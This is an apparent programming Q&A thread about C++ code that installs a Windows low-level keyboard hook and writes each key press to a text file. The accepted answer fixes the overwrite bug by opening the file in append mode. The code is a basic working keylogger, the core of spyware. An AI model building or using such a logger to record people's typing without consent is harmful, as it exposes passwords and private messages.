# Issue with logging keys

Tags: c++

I am trying to make a program that logs keystrokes to a text file, using a low level keyboard hook. The issue I'm having is that while it does log letters, the text file only ever contains the last letter that has been pressed.

For example, if I were to enter the word "hello" the text file would only contain "o".

Here's my code. Thanks again for the help.

```
    #include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <iostream>
#include <fstream>
// function declaration.

using namespace std;

LRESULT CALLBACK LowLevelKeyboardProc( int nCode, WPARAM wParam, LPARAM lParam );
int main()
{

HINSTANCE appInstance = GetModuleHandle(NULL);

    SetWindowsHookEx( WH_KEYBOARD_LL, LowLevelKeyboardProc, appInstance, 0 );
MSG msg;
while(GetMessage(&msg, NULL, 0, 0) > 0)
{
        TranslateMessage(&msg);
        DispatchMessage(&msg);
}

return 0;
}
LRESULT CALLBACK LowLevelKeyboardProc( int nCode, WPARAM wParam, LPARAM lParam )
{
ofstream myfile;
myfile.open("log.txt");
    KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
    switch( wParam )
    {
    case WM_KEYUP: 
        {
            switch( pKeyBoard->vkCode ) 
            {
            case VK_RETURN: 
                myfile<<"Enter  \n"; 
            break;

                   case 0x41:
                myfile<<"A  \n";
                break;

                    case 0x42:
                myfile<<"B  \n";
                break;  

                    case 0x43:
                myfile<<"C  \n";
                break;
                    case 0x44:
                myfile<<"D  \n";
                break;
                                case 0x45:
                myfile<<"E  \n";
                break;
                                case 0x46:
                myfile<<"F  \n";
                break;
                                case 0x47:
                myfile<<"G  \n";
                break;  
                                case 0x48:
                myfile<<"H  \n";
                break;
                                case 0x49:
                myfile<<"I  \n";
                break;
                                case 0x4A:
                myfile<<"J  \n";
                break;
                                case 0x4B:
                myfile<<"K  \n";
                break;

                                case 0x4C:
                myfile<<"L  \n";
                break;

                                case 0x4D:
                myfile<<"M  \n";
                break;

                                case 0x4E:
                myfile<<"N  \n";
                break;

                                case 0x4F:
                myfile<<"O  \n";
                break;

                               case 0x50:
                myfile<<"P  \n";
                break;
                               case 0x51:
                myfile<<"Q  \n";
                break;

                               case 0x52:
                myfile<<"R  \n";
                break;

                                case 0x53:
                myfile<<"S  \n";
                break;
                                case 0x54:
                myfile<<"T  \n";
                break;

                                case 0x55:
                myfile<<"U  \n";
                break;
                                case 0x56:
                myfile<<"V  \n";
                break;
                                case 0x57:
                myfile<<"W  \n";
                break;
                                case 0x58:
                myfile<<"X  \n";
                break;          case 0x59:
                myfile<<"Y  \n";
                break;
                                case 0x5A:
                myfile<<"Z  \n";
                break;


                case 0x30:
                myfile<<"0 \n";
                break;  

                case 0x31:
                myfile<<"1 \n"; 
                break;


                case 0x32:
                myfile<<"2 \n"; 
                break;


                case 0x33:
                myfile<<"3 \n"; 
                break;


                case 0x34:
                myfile<<"4 \n"; 
                break;


                case 0x35:
                myfile<<"5 \n"; 
                break;


                case 0x36:
                myfile<<"6 \n"; 
                break;  


                case 0x37:
                myfile<<"7 \n"; 
                break;  


                case 0x38:
                myfile<<"8 \n"; 
                break;

                case 0x39:
                    myfile<<"9 \n";

                    break;
            }
        }
    default:
        return CallNextHookEx( NULL, nCode, wParam, lParam );
    }
    myfile.close();
    return 0;
}
```

Comment: You do not need all this code to reproduce the problem. It's _a file handling question_. So _all_ of the key handling code can go, as can _all_ of the Windows-specific cruft. Please learn to produce a [5-10 line _minimal_ testcase](http://sscce.org): in doing so here you would have found the problem before needing to post a question.

Comment: You open the file every time your proc is called, but you are not *appending*.

Answer (score 0, accepted):

[`std::ofstream`](http://en.cppreference.com/w/cpp/io/basic_ofstream/basic_ofstream) does not open files in append mode by default; you need to construct it with the `std::ios::app` flag to do that.

So:

```
ofstream myfile;
myfile.open("log.txt", std::ios::app);
```

or simply:

```
ofstream myfile("log.txt", std::ios::app);
```

You must get into the habit of *reading the documentation* for the tools that you use.